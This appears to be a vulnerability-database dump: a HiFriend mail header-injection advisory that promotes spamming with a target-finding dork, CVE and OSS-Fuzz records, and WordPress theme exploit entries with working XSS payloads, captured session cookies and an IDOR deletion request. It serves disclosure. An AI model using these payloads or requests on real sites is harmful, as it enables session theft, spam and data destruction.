{"id": "SECURITYVULNS:DOC:20211", "bulletinFamily": "software", "title": "E-Mail header Injection in HiFriend", "description": "\r\n------------------------------------\r\n-------Header Injection----------\r\n------------------------------------\r\n\r\nScript: hifriend.pl\r\nVendor: Hibyte\r\nSoftwareVersion: The free one you get from many webpages\r\nDork: "hifriend.pl" + "cgi-bin"\r\n\r\n\r\n------------------------------------\r\n---------------Infos---------------\r\n------------------------------------\r\n\r\nThis Exploit allows you to:\r\n\r\n* send spam\r\n* send fakemails\r\n* E-Mail spoofing\r\n\r\nWhit the google dork, you find a lot of pages using HiFriend.\r\nA lot of Servers to send spam with.\r\nModify the source of the Exploit to change the message, your\r\nspoofed e-mail, and the receiver.\r\n\r\nOh and you can send multiple mails!\r\nJust put a comma behind a mail adress.\r\n\r\n\r\n------------------------------------\r\n--------------Exploit---------------\r\n------------------------------------\r\n\r\nhttp://perforin.dark-codez.com/Perl-Scripts/hifriend-xploit.txt\r\n\r\n\r\n------------------------------------\r\n---------Visit & Greetings--------\r\n------------------------------------\r\n\r\nwww.DarK-CodeZ.com\r\n\r\nGreetings to all my Friends ;)\r\n\r\n_________________________________________________________________\r\nTesten Sie Live.com - die schnelle, personalisierte Homepage, über die Sie auf alle für Sie\r\nrelevanten Inhalte zentral zugreifen können.\r\nhttp://www.live.com/getstarted", "published": "2008-07-22T00:00:00", "modified": "2008-07-22T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20211", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:27", "edition": 1, "viewCount": 4, "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2018-08-31T11:10:27", "rev": 2}, "dependencies": {"references": [{"type": "mskb", "idList": ["KB2526297", "KB2501721", "KB317244", "KB980408", "KB981401", "KB2785908", "KB953331", "KB2510690", "KB3191913", "KB2874216"]}], "modified": "2018-08-31T11:10:27", "rev": 2}, "vulnersScore": 0.2}, "affectedSoftware": []}

{"cve": [{"lastseen": "2020-10-03T12:01:15", "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-12T01:15:00", "title": "CVE-2014-2595", "type": "cve", "cwe": ["CWE-613"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2595"], "modified": "2020-02-20T15:55:00", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "id": "CVE-2014-2595", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T21:41:49", "description": "The CTHthemes CityBook before 2.3.4, TownHub before 1.0.6, and EasyBook before 1.2.2 themes for WordPress allow Persistent XSS via Listing Address, Listing Latitude, Listing Longitude, Email Address, Description, Name, Job or Position, Description, Service Name, Address, Latitude, Longitude, Phone Number, or Website.", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2020-01-13T18:15:00", "title": "CVE-2019-20211", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-20211"], "modified": "2020-01-14T15:35:00", "cpe": [], "id": "CVE-2019-20211", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-20211", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}, {"lastseen": "2020-12-09T19:28:28", "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 7, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-18T22:15:00", "title": "CVE-2008-7273", "type": "cve", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7273"], "modified": "2019-11-20T15:56:00", "cpe": [], "id": "CVE-2008-7273", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2020-12-09T19:28:28", "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-11-08T00:15:00", "title": "CVE-2008-7272", "type": "cve", "cwe": ["CWE-312"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7272"], "modified": "2020-02-10T21:16:00", "cpe": [], "id": "CVE-2008-7272", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2020-12-09T20:03:10", "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 5, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-04-30T14:29:00", "title": "CVE-2015-9286", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9286"], "modified": "2019-05-01T14:22:00", "cpe": [], "id": "CVE-2015-9286", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}, {"lastseen": "2020-10-03T13:20:18", "description": "ExifTool 8.32 allows local users to gain privileges by creating a %TEMP%\\par-%username%\\cache-exiftool-8.32 folder with a victim's username, and then copying a Trojan horse ws32_32.dll file into this new folder, aka DLL Hijacking. NOTE: 8.32 is an obsolete version from 2010 (9.x was released starting in 2012, and 10.x was released starting in 2015).", "edition": 3, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-01-02T18:29:00", "title": "CVE-2018-20211", "type": "cve", "cwe": ["CWE-427"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-20211"], "modified": "2019-01-11T20:05:00", "cpe": ["cpe:/a:exiftool_project:exiftool:8.32"], "id": "CVE-2018-20211", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-20211", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:exiftool_project:exiftool:8.32:*:*:*:*:*:*:*"]}], "ossfuzz": [{"lastseen": "2020-04-03T13:38:22", "bulletinFamily": "software", "cvelist": [], "description": "Project:\nhttps://github.com/harfbuzz/harfbuzz.git\n\nDetailed Report: https://oss-fuzz.com/testcase?key=5206191479455744\n\nProject: harfbuzz\nFuzzing Engine: libFuzzer\nFuzz Target: hb-subset-fuzzer\nJob Type: libfuzzer_asan_i386_harfbuzz\nPlatform Id: linux\n\nCrash Type: Heap-buffer-overflow READ {*}\nCrash Address: 0xf250370a\nCrash State:\n OT::HintingDevice* hb_serialize_context_t::embed<OT::HintingDevice>\n OT::HintingDevice::copy\n OT::Device::copy\n \nSanitizer: address (ASAN)\n\nRecommended Security Severity: Medium\n\nRegressed: https://oss-fuzz.com/revisions?job=libfuzzer_asan_i386_harfbuzz&range=202001150211:202001160356\n\nReproducer Testcase: https://oss-fuzz.com/download?testcase_id=5206191479455744\n\nIssue filed automatically.\n\nSee https://google.github.io/oss-fuzz/advanced-topics/reproducing for instructions to reproduce this bug locally.\nWhen you fix this bug, please\n * mention the fix revision(s).\n * state whether the bug was a short-lived regression or an old bug in any stable releases.\n * add any other useful information.\nThis information can help downstream consumers.\n\nIf you need to contact the OSS-Fuzz team with a question, concern, or any other feedback, please file an issue at https://github.com/google/oss-fuzz/issues. Comments on individual Monorail issues are not monitored.\n\nThis bug is subject to a 90 day disclosure deadline. If 90 days elapse\nwithout an upstream patch, then the bug report will automatically\nbecome visible to the public.", "modified": "2020-02-23T20:00:11", "published": "2020-01-18T18:11:42", "id": "OSSFUZZ-20211", "href": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=20211", "type": "ossfuzz", "title": "harfbuzz:hb-subset-fuzzer: Heap-buffer-overflow in OT::HintingDevice* hb_serialize_context_t::embed<OT::HintingDevice>", "cvss": {}}], "wpexploit": [{"lastseen": "2020-12-09T21:00:14", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-20209", "CVE-2019-20210", "CVE-2019-20211", "CVE-2019-20212"], "description": "Multiple vulnerabilities was discovered in the \u00abEasyBook \u2013 Directory & Listing WordPress Theme\u00bb, tested version \u2014 v1.2.1: \\- Unauthenticated Reflected XSS \\- Authenticated Persistent XSS \\- IDOR December 27th, 2019 - Envato Contacted January 6th, 2020 - Envato Investigating January ??th, 2020 - Theme has been removed from Envato January 8th, 2020 - v1.2.2 released January 10th, 2020 - Theme put back on Envato\n", "modified": "2020-09-22T08:25:27", "published": "2020-01-10T00:00:00", "id": "WPEX-ID:10018", "href": "", "type": "wpexploit", "title": "EasyBook < 1.2.2 - Multiple Vulnerabilities", "sourceData": "----[]- Info: -[]----\r\nDemo website: https://www.easybook.cththemes.org/\r\nDemo account: m0ze2/asdasd (login/password)\r\nPoC listing: https://www.easybook.cththemes.org/dashboard/#/listingsPending\r\nGoogle Dork: /wp-content/themes/easybook/\r\nDate: 27/12/2019\r\n\r\n\r\n----[]- Reflected XSS: -[]----\r\nInput field with placeholder \u00abHotel , City...\u00bb on the homepage is vulnerable. Same thing with a regular search (block under the \u00abAdd Listing\u00bb button).\r\n\r\nPayload Sample #0: <img src=x onerror=alert(document.cookie)>\r\nPayload Sample #1: <img src=x onerror=window.location=`https://m0ze.ru`;>\r\n\r\nPoC #0: https://www.easybook.cththemes.org/?search_term=%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E&checkin=&checkout=&adults=1&children=0\r\n\r\nPoC #1: https://www.easybook.cththemes.org/?search_term=%3Cimg+src%3Dx+onerror%3Dwindow.location%3D%60https%3A%2F%2Fm0ze.ru%60%3B%3E&checkin=&checkout=&adults=1&children=0\r\n\r\n\r\n----[]- Persistent XSS -> Chat: -[]----\r\nPossibility to use any cookie stealing payload to hijack user/administrator session or force redirect to malicious website (from https://www.easybook.cththemes.org/dashboard/#/chats or from chat widget on the bottom right corner).\r\n\r\nPayload Sample #0: <img src=x onerror=alert(`m0ze`)>\r\nPayload Sample #1: <img src=x onerror=window.location=`https://m0ze.ru`;>\r\n\r\nPoC:\r\n\r\nPOST /wp-admin/admin-ajax.php HTTP/1.1\r\nHost: www.easybook.cththemes.org\r\nUser-Agent: Mozilla/5.0\r\nAccept: application/json, text/plain, */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 144\r\nOrigin: https://www.easybook.cththemes.org\r\nDNT: 1\r\nConnection: close\r\nReferer: https://www.easybook.cththemes.org/dashboard/\r\nCookie: _your_cookies_here_\r\n\r\naction=easybook_addons_chat_reply&_nonce=1c8cd14288&cid=600&user_id=XXX&touid=1&reply_text=_payload_\r\n\r\nWhere:\r\nuser_id=XXX (your unique WordPress ID);\r\ntouid=1 (message receiver ID, in this example ID 1 == account \u00abadmin\u00bb);\r\nreply_text=_payload_ (your payload).\r\n\r\n\r\n----[]- Persistent XSS -> Listing page: -[]----\r\nAdd new listing here https://www.easybook.cththemes.org/dashboard/#/addListing (first time you need to order a \u00abFree\u00bb plan and go to this URL again).\r\nVulnerable input fields: \u00abAddress\u00bb, \u00abLongitude\u00bb, \u00abLatitude\u00bb, \u00abFact Title\u00bb and \u00abFact Number\u00bb.\r\n\r\nPayload Sample #0: \"><img src=x onerror=alert(document.cookie)>\r\nPayload Sample #1: \"><h1>Greetings from m0ze</h1>\r\nPayload Sample #2: \"><script>alert(`PoC`);</script>\r\n\r\nPoC:\r\n\r\nPOST /wp-admin/admin-ajax.php HTTP/1.1\r\nHost: www.easybook.cththemes.org\r\nUser-Agent: Mozilla/5.0\r\nAccept: application/json, text/plain, */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: multipart/form-data; boundary=---------------------------970149683563\r\nContent-Length: 4142\r\nOrigin: https://www.easybook.cththemes.org\r\nDNT: 1\r\nConnection: close\r\nReferer: https://www.easybook.cththemes.org/dashboard/\r\nCookie: _your_cookies_here_\r\n\r\n-----------------------------970149683563\r\nContent-Disposition: form-data; name=\"lid\"\r\n\r\n0\r\n-----------------------------970149683563\r\nContent-Disposition: form-data; name=\"listing_type_id\"\r\n\r\n5058\r\n-----------------------------970149683563\r\nContent-Disposition: form-data; name=\"isSubmit\"\r\n\r\ntrue\r\n-----------------------------970149683563\r\nContent-Disposition: form-data; name=\"working_hours[timezone]\"\r\n\r\nAmerica/New_York\r\n-----------------------------970149683563\r\nContent-Disposition: form-data; name=\"working_hours[Monday][static]\"\r\n\r\nenterHours\r\n-----------------------------970149683563\r\nContent-Disposition: form-data; name=\"working_hours[Tuesday][static]\"\r\n\r\nenterHours\r\n-----------------------------970149683563\r\nContent-Disposition: form-data; name=\"working_hours[Wednesday][static]\"\r\n\r\nenterHours\r\n-----------------------------970149683563\r\nContent-Disposition: form-data; name=\"working_hours[Thursday][static]\"\r\n\r\nenterHours\r\n-----------------------------970149683563\r\nContent-Disposition: form-data; name=\"working_hours[Friday][static]\"\r\n\r\nenterHours\r\n-----------------------------970149683563\r\nContent-Disposition: form-data; name=\"working_hours[Saturday][static]\"\r\n\r\nenterHours\r\n-----------------------------970149683563\r\nContent-Disposition: form-data; name=\"working_hours[Sunday][static]\"\r\n\r\nenterHours\r\n-----------------------------970149683563\r\nContent-Disposition: form-data; name=\"locations\"\r\n\r\nUS|M\r\n-----------------------------970149683563\r\nContent-Disposition: form-data; name=\"title\"\r\n\r\nPoC\r\n-----------------------------970149683563\r\nContent-Disposition: form-data; name=\"address\"\r\n\r\n\"><img src=x onerror=alert(1)>\r\n-----------------------------970149683563\r\nContent-Disposition: form-data; name=\"longitude\"\r\n\r\n\"><img src=x onerror=alert(2)>\r\n-----------------------------970149683563\r\nContent-Disposition: form-data; name=\"latitude\"\r\n\r\n\"><img src=x onerror=alert(3)>\r\n-----------------------------970149683563\r\nContent-Disposition: form-data; name=\"author_email\"\r\n\r\nM\r\n-----------------------------970149683563\r\nContent-Disposition: form-data; name=\"author_phone\"\r\n\r\nM\r\n-----------------------------970149683563\r\nContent-Disposition: form-data; name=\"author_website\"\r\n\r\nM\r\n-----------------------------970149683563\r\nContent-Disposition: form-data; name=\"content\"\r\n\r\n\"><img src=x onerror=alert(document.domain)>\r\n-----------------------------970149683563\r\nContent-Disposition: form-data; name=\"features[0]\"\r\n\r\n303\r\n-----------------------------970149683563\r\nContent-Disposition: form-data; name=\"features[1]\"\r\n\r\n300\r\n-----------------------------970149683563\r\nContent-Disposition: form-data; name=\"features[2]\"\r\n\r\n305\r\n-----------------------------970149683563\r\nContent-Disposition: form-data; name=\"features[3]\"\r\n\r\n302\r\n-----------------------------970149683563\r\nContent-Disposition: form-data; name=\"facts[0][title]\"\r\n\r\n\"><img src=x onerror=alert(9)>\r\n-----------------------------970149683563\r\nContent-Disposition: form-data; name=\"facts[0][number]\"\r\n\r\n\"><img src=x onerror=alert(10)>\r\n-----------------------------970149683563\r\nContent-Disposition: form-data; name=\"facts[0][icon]\"\r\n\r\n123\r\n-----------------------------970149683563\r\nContent-Disposition: form-data; name=\"lservices[0][service_id]\"\r\n\r\n-imgsrcxonerroralert12\r\n-----------------------------970149683563\r\nContent-Disposition: form-data; name=\"lservices[0][service_name]\"\r\n\r\nM\r\n-----------------------------970149683563\r\nContent-Disposition: form-data; name=\"lservices[0][service_desc]\"\r\n\r\nM\r\n-----------------------------970149683563\r\nContent-Disposition: form-data; name=\"lservices[0][service_price]\"\r\n\r\n0\r\n-----------------------------970149683563\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nsubmit_listing\r\n-----------------------------970149683563\r\nContent-Disposition: form-data; name=\"_wpnonce\"\r\n\r\n1c8cd14288\r\n-----------------------------970149683563--\r\n\r\n\r\n----[]- IDOR: -[]----\r\nDelete any post/page/listing:\r\n\r\nPOST /wp-admin/admin-ajax.php HTTP/1.1\r\nHost: www.easybook.cththemes.org\r\nUser-Agent: Mozilla/5.0\r\nAccept: application/json, text/plain, */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 64\r\nOrigin: https://www.easybook.cththemes.org\r\nDNT: 1\r\nConnection: close\r\nReferer: https://www.easybook.cththemes.org/dashboard/\r\nCookie: _your_cookies_here_\r\n\r\naction=easybook_addons_delete_listing&_nonce=1c8cd14288&lid=XXXX\r\n\r\nWhere:\r\nlid=XXXX (page/post/listing unique WordPress ID, can be discovered as a page class for <body> tag).", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-12-09T22:38:42", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-20210", "CVE-2019-20211", "CVE-2019-20212", "CVE-2019-20209"], "description": "Multiple vulnerabilities was discovered in the \u00abCityBook - Directory & Listing WordPress Theme\u00bb, tested version \u2014 v2.3.3: \\- Unauthenticated Reflected XSS \\- Authenticated Persistent XSS \\- IDOR Edit (WPScanTeam): December 27h, 2019 - Envato Contacted January 6th, 2020 - Envato Investigating January 7th, 2020 - v2.3.4 released\n", "modified": "2020-09-22T07:40:43", "published": "2020-01-09T00:00:00", "id": "WPEX-ID:10013", "href": "", "type": "wpexploit", "title": "CityBook < 2.3.4 - Multiple Vulnerabilities", "sourceData": "----[]- Info: -[]----\r\nGoogle Dork: /wp-content/themes/citybook/\r\nDate: 27/12/2019\r\nDemo website: https://citybook2.cththemes.com/\r\nDemo account: m0ze2/asdasd (login/password)\r\nPoC listing: https://citybook2.cththemes.com/dashboard/?dashboard=listings\r\n\r\n\r\n----[]- Reflected XSS: -[]----\r\nInput field with placeholder \u00abWhat are you looking for?\u00bb on the homepage is vulnerable. Any payload will be triggered three times if you use \"> in front of it. Same thing with a regular search (block near website logo).\r\n\r\nPayload Sample #0: \"><img src=x onerror=alert(document.cookie)>\r\nPayload Sample #1: <img src=x onerror=alert(document.domain)>\r\nPayload Sample #2: <img src=x onerror=window.location=`https://m0ze.ru`;>\r\n\r\nPoC #0: https://citybook2.cththemes.com/?search_term=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E#038;location_search&#038;nearby=off&#038;address_lat&#038;address_lng&#038;distance=10&#038;lcats%5B%5D=\r\n\r\nPoC #1: https://citybook2.cththemes.com/?search_term=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D=\r\n\r\nPoC #2: https://citybook2.cththemes.com/?search_term=%22%3E%3Cimg+src%3Dx+onerror%3Dwindow.location%3D%60https%3A%2F%2Fm0ze.ru%60%3B%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D=\r\n\r\n\r\n----[]- Persistent XSS -> Chat: -[]----\r\nPossibility to use any cookie stealing payload to hijack user/administrator session or force redirect to malicious website (from https://citybook2.cththemes.com/dashboard/?dashboard=chats or from chat widget on the bottom right corner).\r\n\r\nPayload Sample #0: <img src=x onerror=alert(`m0ze`)>\r\nPayload Sample #1: <img src=x onerror=window.location=`https://m0ze.ru`;>\r\n\r\nPoC:\r\n\r\nPOST /wp-admin/admin-ajax.php HTTP/1.1\r\nHost: citybook2.cththemes.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0\r\nAccept: application/json, text/plain, */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 172\r\nOrigin: https://citybook2.cththemes.com\r\nDNT: 1\r\nConnection: close\r\nReferer: https://citybook2.cththemes.com/dashboard/?dashboard=chats\r\nCookie: wordpress_sec_54d435e7d6922c566192cbf944196731=m0ze%7C1577594557%7C8iIk54JQ5kAHa6T7JSiVvfOBTdqUbwjbQ4N5dlpeobY%7C405cfe7009dfb008514e88229282ad33155a10e3d6d1c666e2cee90970212542; tk_ai=woo%3AQQKdIMycj4rMbRJC%2BiDJmr%2FX; wordpress_logged_in_54d435e7d6922c566192cbf944196731=m0ze%7C1577594557%7C8iIk54JQ5kAHa6T7JSiVvfOBTdqUbwjbQ4N5dlpeobY%7Cbc01a1bfc8e119a186128f522382374eae5a7d80a044290cfd77280880c51de0\r\n\r\naction=citybook_addons_chat_reply&_nonce=a75ac6298d&cid=1230&user_id=785&touid=1&reply_text=%3Cimg%20src%3Dx%20onerror%3Dwindow.location%3D%60https%3A%2F%2Fm0ze.ru%60%3B%3E\r\n\r\nWhere:\r\nuser_id=XXX (your ID; in this example account \u00abm0ze\u00bb have ID 785);\r\ntouid=1 (message receiver ID, in this example ID 1 == account \u00abadmin\u00bb);\r\nreply_text=_payload_ (your payload text).\r\n\r\n\r\n----[]- Persistent Self-XSS -> Profile: -[]----\r\nVulnerable input fields: \u00abPhone\u00bb and \u00abAddress\u00bb (will be triggered only on https://citybook2.cththemes.com/dashboard/?dashboard=profile page for current user).\r\n\r\nPayload Sample #0: \"><img src=x onerror=alert(document.cookie)>\r\nPayload Sample #1: \"><h1>Greetings from m0ze</h1>\r\nPayload Sample #2: \"><script>alert(`PoC`);</script>\r\n\r\n\r\n----[]- Persistent XSS -> Listing page: -[]----\r\nAdd new listing here https://citybook2.cththemes.com/submit/ (first time you need to order a \u00abFree\u00bb plan and go to this URL again).\r\nVulnerable input fields: \u00abListing Address\u00bb, \u00abListing Latitude\u00bb, \u00abListing Longitude\u00bb, \u00abEmail Address\u00bb, \u00abDescription\u00bb. \u00abTrainers\u00bb section: \u00abAdd Member\u00bb option with \u00abName\u00bb, \u00abJob or Position\u00bb and \u00abDescription\u00bb vulnerable input fields. \u00abAdditional Services Fees\u00bb section: \u00abAdd Service\u00bb option with \u00abService Name\u00bb vulnerable input field. \u00abListing Address\u00bb payload also works on the admin dashboard, so it's possible to steal administrator cookies.\r\n\r\nPayload Sample #0: \"><img src=x onerror=alert(document.cookie)>\r\nPayload Sample #1: \"><h1>Greetings from m0ze</h1>\r\nPayload Sample #2: \"><script>alert(`PoC`);</script>\r\n\r\nPoC:\r\nPOST /wp-admin/admin-ajax.php HTTP/1.1\r\nHost: citybook2.cththemes.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0\r\nAccept: application/json, text/plain, */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: multipart/form-data; boundary=---------------------------18467633426500\r\nContent-Length: 5848\r\nOrigin: https://citybook2.cththemes.com\r\nDNT: 1\r\nConnection: close\r\nReferer: https://citybook2.cththemes.com/edit-listing/?listing_id=7610\r\nCookie: wordpress_sec_54d435e7d6922c566192cbf944196731=m0ze2%7C1577601272%7CzdPIIYkbIF1EvBpygfJo6Sp9MO5rD5h2FRb0kSFOkb5%7C62973039250bcf64067f2d87460bc142bfc1a6623ea7c5a57cc973245fff0a97; tk_ai=woo%3AQQKdIMycj4rMbRJC%2BiDJmr%2FX; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_54d435e7d6922c566192cbf944196731=m0ze2%7C1577601272%7CzdPIIYkbIF1EvBpygfJo6Sp9MO5rD5h2FRb0kSFOkb5%7C1790d7d33689fe6e21ffc2bcd001af3aa10e523b5a701b6f02944a4dd965f170; wp-settings-788=editor%3Dhtml; wp-settings-time-788=1577428516\r\n\r\n-----------------------------18467633426500\r\nContent-Disposition: form-data; 